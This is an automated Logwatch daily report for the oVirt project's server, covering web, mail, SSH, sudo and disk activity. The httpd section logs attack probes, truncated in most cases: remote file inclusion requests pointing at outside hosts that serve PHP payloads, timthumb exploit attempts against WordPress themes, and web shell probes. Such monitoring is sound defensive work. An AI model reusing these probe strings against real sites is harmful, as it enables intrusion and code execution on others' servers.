Logwatch for linode01.ovirt.org (Linux)
################### Logwatch 7.3.6 (05/19/07) #################### Processing Initiated: Sat Mar 16 03:40:32 2013 Date Range Processed: yesterday ( 2013-Mar-15 ) Period is day. Detail Level of Output: 0 Type of Output: unformatted Logfiles for Host: linode01.ovirt.org ################################################################## --------------------- httpd Begin ------------------------ A total of 1 sites probed the server 124.77.189.31 A total of 1 possible successful probes were detected (the following URLs contain strings that match one or more of a listing of strings that indicate a possible exploit): null HTTP Response 200 Requests with error response codes 404 Not Found /%22/bbs/%22test: 1 Time(s) //admin/record_company.php/password_forgotten.php: 1 Time(s) //appserv/main.php?appserv_root=http://pic ... et/indeks.php??: 10 Time(s) //appserv/main.php?appserv_root=http://uzv ... u/license.txt??: 10 Time(s) //appserv/main.php?appserv_root=http://www ... 010/07/on.png??: 1 Time(s) //appserv/main.php?appserv_root=http://www ... 10/07/off.png??: 1 Time(s) //appserv/main.php?appserv_root=test??: 6 Time(s) //booth.php?include_path=http://picasa.com ... et/indeks.php??: 16 Time(s) //booth.php?include_path=http://uzvezdy.ru/license.txt??: 16 Time(s) //booth.php?include_path=test??: 8 Time(s) //data/shell.php?cmd=: 2 Time(s) //wp-content/themes/Envisioned/thumb.php?s ... /cybercrime.php: 2 Time(s) /2012/08/08/ovirt-3-1-release/: 1 Time(s) /Download: 1 Time(s) /admin/banner_manager.php/login.php: 2 Time(s) /admin/categories.php/login.php: 3 Time(s) /admin/file_manager.php/login.php: 2 Time(s) /admin/sqlpatch.php/password_forgotten.php?action=execute: 1 Time(s) /apple-touch-icon-precomposed.png: 2 Time(s) /apple-touch-icon.png: 2 Time(s) /category/news/feed: 19 Time(s) /category/news/feed/: 101 Time(s) /community: 1 Time(s) /favicon.ico: 529 Time(s) /licensing: 1 Time(s) /marketing: 2 Time(s) /models/: 1 Time(s) /pipermail/index.php?act=Reg&CODE=00: 1 Time(s) /pipermail/index.php?app=core&module=global§ion=register: 1 Time(s) /pipermail/infra//appserv/main.php?appserv ... 010/07/on.png??: 1 Time(s) /pipermail/infra//appserv/main.php?appserv ... 10/07/off.png??: 1 Time(s) /pipermail/infra//appserv/main.php?appserv_root=test??: 1 Time(s) /pipermail/infra//wp-content/themes/Envisi ... /cybercrime.php: 2 Time(s) /pipermail/infra/2012-February//appserv/ma ... erv_root=test??: 4 Time(s) /pipermail/infra/2012-February//appserv/ma ... et/indeks.php??: 8 Time(s) /pipermail/infra/2012-February//appserv/ma ... u/license.txt??: 8 Time(s) /pipermail/infra/2012-February/000224.html ... erv_root=test??: 8 Time(s) /pipermail/infra/2012-February/000224.html ... et/indeks.php??: 16 Time(s) /pipermail/infra/2012-February/000224.html ... u/license.txt??: 16 Time(s) /pipermail/infra/2012-November//appserv/ma ... erv_root=test??: 3 Time(s) /pipermail/infra/2012-November//appserv/ma ... et/indeks.php??: 6 Time(s) /pipermail/infra/2012-November//appserv/ma ... u/license.txt??: 6 Time(s) /pipermail/infra/2012-November//wp-content ... /cybercrime.php: 2 Time(s) /pipermail/infra/2012-November/001285.html ... inc.com/jos.php: 2 Time(s) /pipermail/infra/2012-November/001285.html ... nc.com/jack.php: 1 Time(s) /pipermail/infra/2012-November/001330.html ... .net/indeks.php: 20 Time(s) /pipermail/infra/2012-November/001330.html ... .ru/license.txt: 10 Time(s) /pipermail/infra/2012-November/001330.html ... ema.com/bad.php: 1 Time(s) /pipermail/infra/2012-November/001330.html ... g.ro%2Frawk.php: 2 Time(s) /pipermail/infra/2012-November/001330.html ... l.com/stunz.php: 1 Time(s) /pipermail/infra/2012-November/001330.html ... om%2Fstunxx.php: 1 Time(s) /pipermail/infra/2012-November/001330.html ... om%2Fupload.php: 1 Time(s) /pipermail/infra/2012-November/001330.html ... uk%2Fsimple.php: 3 Time(s) /pipermail/infra/2012-November/001393.html ... al.com%2Fsh.php: 1 Time(s) /pipermail/infra/2012-November/001445.html ... e.com%2Fbad.php: 1 Time(s) /pipermail/infra/2012-November/001445.html ... x.com/users.php: 4 Time(s) /pipermail/infra/2012-November/001462.html ... ill.com/bad.php: 1 Time(s) /pipermail/infra/2012-November/001471.html ... uk%2Fsimple.php: 3 Time(s) /pipermail/infra/2012-November/001483.html ... om%2Fstunxx.php: 1 Time(s) /pipermail/infra/2012-November/001552.html ... c.com%2Fbad.php: 1 Time(s) /pipermail/infra/2012-November/001552.html ... erv_root=test??: 7 Time(s) /pipermail/infra/2012-November/001552.html ... et/indeks.php??: 14 Time(s) /pipermail/infra/2012-November/001552.html ... u/license.txt??: 14 Time(s) /pipermail/infra/2012-November/001572.html ... mage-upload.php: 1 Time(s) /pipermail/infra/2012-November/wp-content/ ... .net/indeks.php: 2 Time(s) /pipermail/infra/2012-November/wp-content/ ... .ru/license.txt: 1 Time(s) /pipermail/infra/2012-November/wp-content/ ... al.com%2Fsh.php: 1 Time(s) /pipermail/infra/2012-November/wp-content/ ... c.com%2Fbad.php: 3 Time(s) /pipermail/infra/2012-November/wp-content/ ... e.com%2Fbad.php: 1 Time(s) /pipermail/infra/2012-November/wp-content/ ... ema.com/bad.php: 1 Time(s) /pipermail/infra/2012-November/wp-content/ ... et%2Findeks.php: 1 Time(s) /pipermail/infra/2012-November/wp-content/ ... g.org%2Fbad.php: 1 Time(s) /pipermail/infra/2012-November/wp-content/ ... g.ro%2Frawk.php: 1 Time(s) /pipermail/infra/2012-November/wp-content/ ... ill.com/bad.php: 1 Time(s) /pipermail/infra/2012-November/wp-content/ ... inc.com/jos.php: 2 Time(s) /pipermail/infra/2012-November/wp-content/ ... l.com/stunz.php: 1 Time(s) /pipermail/infra/2012-November/wp-content/ ... mage-upload.php: 2 Time(s) /pipermail/infra/2012-November/wp-content/ ... n.com%2Fbad.php: 3 Time(s) /pipermail/infra/2012-November/wp-content/ ... nc.com/jack.php: 1 Time(s) /pipermail/infra/2012-November/wp-content/ ... om%2Fstunxx.php: 1 Time(s) /pipermail/infra/2012-November/wp-content/ ... om%2Fupload.php: 2 Time(s) /pipermail/infra/2012-November/wp-content/ ... uk%2Fsimple.php: 1 Time(s) /pipermail/infra/2012-November/wp-content/ ... x.com/users.php: 4 Time(s) /pipermail/infra/2012-October//appserv/mai ... 010/07/on.png??: 1 Time(s) /pipermail/infra/2012-October//appserv/mai ... 10/07/off.png??: 1 Time(s) /pipermail/infra/2012-October//appserv/mai ... erv_root=test??: 4 Time(s) /pipermail/infra/2012-October//appserv/mai ... et/indeks.php??: 6 Time(s) /pipermail/infra/2012-October//appserv/mai ... u/license.txt??: 6 Time(s) /pipermail/infra/2012-October//booth.php?i ... et/indeks.php??: 16 Time(s) /pipermail/infra/2012-October//booth.php?i ... u/license.txt??: 16 Time(s) /pipermail/infra/2012-October//booth.php?include_path=test??: 8 Time(s) /pipermail/infra/2012-October/001166.html& ... r.php/login.php: 2 Time(s) /pipermail/infra/2012-October/001166.html& ... s.php/login.php: 2 Time(s) /pipermail/infra/2012-October/001166.html/ ... tals.ro/tim.php: 1 Time(s) /pipermail/infra/2012-October/001181.html& ... inc.com/jos.php: 1 Time(s) /pipermail/infra/2012-October/001234.html& ... et/indeks.php??: 84 Time(s) /pipermail/infra/2012-October/001234.html& ... u/license.txt??: 84 Time(s) /pipermail/infra/2012-October/001234.html& ... ude_path=test??: 42 Time(s) /pipermail/infra/2012-October/001235.html& ... r.php/login.php: 4 Time(s) /pipermail/infra/2012-October/001235.html& ... s.php/login.php: 2 Time(s) /pipermail/infra/2012-October/001244.html& ... erv_root=test??: 17 Time(s) /pipermail/infra/2012-October/001244.html& ... et/indeks.php??: 34 Time(s) /pipermail/infra/2012-October/001244.html& ... u/license.txt??: 34 Time(s) /pipermail/infra/2012-October/admin/banner ... r.php/login.php: 2 Time(s) /pipermail/infra/2012-October/admin/categories.php/login.php: 3 Time(s) /pipermail/infra/2012-October/admin/file_m ... r.php/login.php: 2 Time(s) /pipermail/infra/2012-October/wp-content/t ... inc.com/jos.php: 1 Time(s) /pipermail/infra/2012-October/wp-content/t ... tals.ro/tim.php: 1 Time(s) /pipermail/infra/2012-September/%22/bbs/%22test: 1 Time(s) /pipermail/infra/2012-September//admin/rec ... d_forgotten.php: 1 Time(s) /pipermail/infra/2012-September//data/shell.php?cmd=: 2 Time(s) /pipermail/infra/2012-September/001024.htm ... r.php/login.php: 2 Time(s) /pipermail/infra/2012-September/001024.htm ... s.php/login.php: 4 Time(s) /pipermail/infra/2012-September/001139.htm ... inc.com/jos.php: 1 Time(s) /pipermail/infra/2012-September/001139.htm ... nc.com/jack.php: 1 Time(s) /pipermail/infra/2012-September/001144.htm ... %22/bbs/%22test: 1 Time(s) /pipermail/infra/2012-September/001144.htm ... /shell.php?cmd=: 2 Time(s) /pipermail/infra/2012-September/001144.htm ... ard.php?id=test: 1 Time(s) /pipermail/infra/2012-September/001161.htm ... ?action=execute: 1 Time(s) /pipermail/infra/2012-September/001161.htm ... d_forgotten.php: 1 Time(s) /pipermail/infra/2012-September/admin/bann ... r.php/login.php: 1 Time(s) /pipermail/infra/2012-September/admin/cate ... s.php/login.php: 1 Time(s) /pipermail/infra/2012-September/admin/sqlp ... ?action=execute: 1 Time(s) /pipermail/infra/2012-September/wp-content ... inc.com/jos.php: 1 Time(s) /pipermail/infra/2012-September/wp-content ... nc.com/jack.php: 1 Time(s) /pipermail/infra/2012-September/zboard.php?id=test: 1 Time(s) /pipermail/infra/wp-content/themes/edupres ... et%2Findeks.php: 1 Time(s) /pipermail/infra/wp-content/themes/edupres ... om%2Fupload.php: 1 Time(s) /pipermail/user/register: 1 Time(s) /pipermail/users/2013: 1 Time(s) /releases/3.1/rpm/fedora/17/noarch/old: 1 Time(s) /releases/3.1/rpm/fedora/17/noarch/ovirt-e ... fc17.noarch.rpm: 1 Time(s) /releases/3.1/rpm/fedora/17/noarch/repodata: 1 Time(s) /releases/3.1/rpm/fedora/17/srpms/repodata: 1 Time(s) /releases/3.1/tools/oVirt-Live-0.6.iso: 1 Time(s) /releases/alpha/iso/ovirt-node-iso-2.6.0-2 ... 290835.fc18.iso: 1 Time(s) /releases/beta.old.20120808/fedora/17/: 1 Time(s) /releases/beta/fedora/17/repodata/filelists.xml.gz: 7 Time(s) /releases/beta/fedora/17/repodata/repomd.xml: 25 Time(s) /releases/beta/ovirt-engine.repo: 2 Time(s) /releases/nightly/fedora/16/ovirt-engine-s ... fc16.noarch.rpm: 1 Time(s) /releases/nightly/fedora/16/ovirt-engine.repo: 1 Time(s) /releases/nightly/fedora/16/repodata/repomd.xml: 13 Time(s) /releases/nightly/rpm/EL/6/noarch/repodata/repomd.xml: 1 Time(s) /releases/nightly/rpm/Fedora/17/ovirt-engine.repo: 1 Time(s) /releases/nightly/tools/ovirt-node-iso-2.5 ... c3.533.fc18.iso: 1 Time(s) /releases/nightly/tools/ovirt-node-iso-2.6 ... ca.639.fc18.iso: 1 Time(s) /releases/ovirt-release-fedora.noarch.rpm+: 1 Time(s) /releases/stable/binary/: 3 Time(s) /releases/stable/fedora/16/: 1 Time(s) /releases/stable/fedora/16/ovirt-engine.repo: 1 Time(s) /releases/stable/fedora/16/repodata/primary.xml.gz: 26 Time(s) /releases/stable/fedora/16/repodata/repomd.xml: 212 Time(s) /releases/stable/fedora/18/ovirt-engine.repo: 1 Time(s) /releases/stable/ovirt-engine.repo%20-O%20 ... virtengine.repo: 1 Time(s) /releases/stable/rpm/EL/6/noarch/: 1 Time(s) /releases/stable/rpm/EL/6/repodata/repomd.xml: 8 Time(s) /releases/stable/rpm/EL6: 1 Time(s) /releases/stable/rpm/EL6/6/repodata/: 1 Time(s) /releases/stable/rpm/EL6/6/repodata/repomd.xml: 71 Time(s) /releases/stable/rpm/EL6/6Server/repodata/repomd.xml: 31 Time(s) /releases/stable/rpm/EL6/6Workstation/repodata/repomd.xml: 8 Time(s) /releases/stable/rpm/Fedora/16/repodata/repomd.xml: 17 Time(s) /releases/stable/src/%25: 1 Time(s) /releases/stable/src/ovirt-node-2.5.0.tar.gz: 1 Time(s) /robots.txt: 38 Time(s) /trafficbasedsspsitemap.xml: 1 Time(s) /wiki/OVirt_3.0_to_3.1_upgrade: 1 Time(s) /wiki/OVirt_3.1_release_notes: 1 Time(s) /wp-content/plugins/radykal-fancy-gallery/ ... mage-upload.php: 2 Time(s) /wp-content/themes/Minimal/timthumb.php?sr ... tals.ro/tim.php: 1 Time(s) /wp-content/themes/TheProfessional/timthum ... al.com%2Fsh.php: 1 Time(s) /wp-content/themes/TheTravelTheme/includes ... .net/indeks.php: 2 Time(s) /wp-content/themes/TheTravelTheme/includes ... .ru/license.txt: 1 Time(s) /wp-content/themes/TheTravelTheme/includes ... ema.com/bad.php: 1 Time(s) /wp-content/themes/TheTravelTheme/includes ... l.com/stunz.php: 1 Time(s) /wp-content/themes/TheTravelTheme/includes ... om%2Fstunxx.php: 1 Time(s) /wp-content/themes/TheTravelTheme/includes ... uk%2Fsimple.php: 1 Time(s) /wp-content/themes/arras/library/timthumb. ... inc.com/jos.php: 1 Time(s) /wp-content/themes/biznizz/functions/thumb ... ill.com/bad.php: 1 Time(s) /wp-content/themes/delicate/thumb.php?src= ... g.org%2Fbad.php: 1 Time(s) /wp-content/themes/delicate/thumb.php?src= ... inc.com/jos.php: 2 Time(s) /wp-content/themes/delicate/thumb.php?src= ... nc.com/jack.php: 1 Time(s) /wp-content/themes/edupress/scripts/timthu ... et%2Findeks.php: 1 Time(s) /wp-content/themes/edupress/scripts/timthu ... g.ro%2Frawk.php: 1 Time(s) /wp-content/themes/edupress/scripts/timthu ... om%2Fupload.php: 2 Time(s) /wp-content/themes/mainstream/thumb.php?sr ... c.com%2Fbad.php: 1 Time(s) /wp-content/themes/overeasy/thumb.php?src= ... c.com%2Fbad.php: 1 Time(s) /wp-content/themes/pico/scripts/timthumb.p ... nc.com/jack.php: 1 Time(s) /wp-content/themes/skeptical/tools/timthum ... n.com%2Fbad.php: 1 Time(s) /wp-content/themes/themorningafter/thumb.p ... c.com%2Fbad.php: 1 Time(s) /wp-content/themes/u-design/scripts/timthu ... inc.com/jos.php: 1 Time(s) /wp-content/themes/welcome_inn/thumb.php?s ... e.com%2Fbad.php: 1 Time(s) /wp-content/themes/welcome_inn/thumb.php?s ... x.com/users.php: 4 Time(s) /wp-content/themes/welcome_inn/timthumb.ph ... n.com%2Fbad.php: 2 Time(s) /wp-login.php: 67 Time(s) /zboard.php?id=test: 1 Time(s) http://lists.ovirt.org/pipermail/infra/201 ... HTTP_ENV_VARS=1: 1 Time(s) http://lists.ovirt.org/zboard.php?id=test/ ... HTTP_ENV_VARS=1: 1 Time(s) http://www.ovirt.org/azenv.php: 1 Time(s) 416 Request Range Not Satisfiable /releases/3.2/rpm/Fedora/18/x86_64/libgude ... 18.2.x86_64.rpm: 1 Time(s) /releases/3.2/rpm/Fedora/18/x86_64/vdsm-4. ... fc18.x86_64.rpm: 1 Time(s) /releases/beta/rpm/Fedora/18/repodata/other.xml.gz: 10 Time(s) /releases/beta/rpm/Fedora/18/x86_64/vdsm-4 ... fc18.x86_64.rpm: 1 Time(s) /releases/nightly/rpm/Fedora/17/repodata/other.xml.gz: 1 Time(s) /releases/nightly/rpm/Fedora/18/noarch/ovi ... fc18.noarch.rpm: 1 Time(s) /releases/nightly/rpm/Fedora/18/repodata/filelists.xml.gz: 1 Time(s) /releases/nightly/rpm/Fedora/18/repodata/other.xml.gz: 8 Time(s) /releases/stable/rpm/Fedora/18/i686/vdsm-4 ... 6.fc18.i686.rpm: 1 Time(s) /releases/stable/rpm/Fedora/18/i686/vdsm-4 ... 8.fc18.i686.rpm: 1 Time(s) /releases/stable/rpm/Fedora/18/noarch/ovir ... fc18.noarch.rpm: 11 Time(s) /releases/stable/rpm/Fedora/18/noarch/vdsm ... fc18.noarch.rpm: 20 Time(s) /releases/stable/rpm/Fedora/18/repodata/other.xml.gz: 83 Time(s) /releases/stable/rpm/Fedora/18/x86_64/libg ... 18.2.x86_64.rpm: 18 Time(s) /releases/stable/rpm/Fedora/18/x86_64/vdsm ... fc18.x86_64.rpm: 2 Time(s) ---------------------- httpd End ------------------------- --------------------- Postfix Begin ------------------------ 5 *Warning: Pre-queue content-filter connection overload 5.218M Bytes accepted 5,471,691 186.008M Bytes delivered 195,043,607 ======== ================================================ 856 Accepted 99.07% 8 Rejected 0.93% -------- ------------------------------------------------ 864 Total 100.00% ======== ================================================ 4 Reject relay denied 50.00% 4 Reject unknown user 50.00% -------- ------------------------------------------------ 8 Total Rejects 100.00% ======== ================================================ 451 Connections made 25 Connections lost 451 Disconnections 840 Removed from queue 260 Delivered 33814 Sent via SMTP 3 Forwarded 51 Deferred 517 Deferrals 25 Bounce (remote) 16 Expired and returned to sender 41 DSNs undeliverable 712 Connection failure (outbound) 19 Timeout (inbound) 11 Hostname verification errors 264 Enabled PIX workaround ---------------------- Postfix End ------------------------- --------------------- SSHD Begin ------------------------ Users logging in through sshd: gerrit-backup: 107.22.212.69 (gerrit.ovirt.org): 3 times jenkins: 93.186.181.42 (jenkins.ekohl.nl): 2 times jslave: 23.20.17.161 (ec2-23-20-17-161.compute-1.amazonaws.com): 1 time mburns: 24.63.186.29 (c-24-63-186-29.hsd1.vt.comcast.net): 2 times Received disconnect: 11: Bye Bye : 2210 Time(s) 11: disconnected by user : 4 Time(s) SFTP subsystem requests: 3 Time(s) **Unmatched Entries** Disconnecting: Change of username or service not allowed: (nickname,ssh-connection) -> (name,ssh-connection) : 1 time(s) Disconnecting: Change of username or service not allowed: (sharon,ssh-connection) -> (aron,ssh-connection) : 1 time(s) Disconnecting: Change of username or service not allowed: (username,ssh-connection) -> (user,ssh-connection) : 1 time(s) Disconnecting: Change of username or service not allowed: (mcedit,ssh-connection) -> (edit,ssh-connection) : 1 time(s) Disconnecting: Change of username or service not allowed: (kathi,ssh-connection) -> (at,ssh-connection) : 1 time(s) ---------------------- SSHD End ------------------------- --------------------- Sudo (secure-log) Begin ------------------------ ============================================================================== mburns => root -------------- /bin/cp - 1 Times. /bin/mv - 7 Times. /bin/rm - 1 Times. /usr/bin/createrepo - 2 Times. ---------------------- Sudo (secure-log) End ------------------------- --------------------- Disk Space Begin ------------------------ Filesystem Size Used Avail Use% Mounted on /dev/xvda 48G 45G 2.9G 94% / /dev/xvda => 94% Used. Warning. Disk Filling up. ---------------------- Disk Space End ------------------------- ###################### Logwatch End #########################
participants (1)
-
logwatch@lists.ovirt.org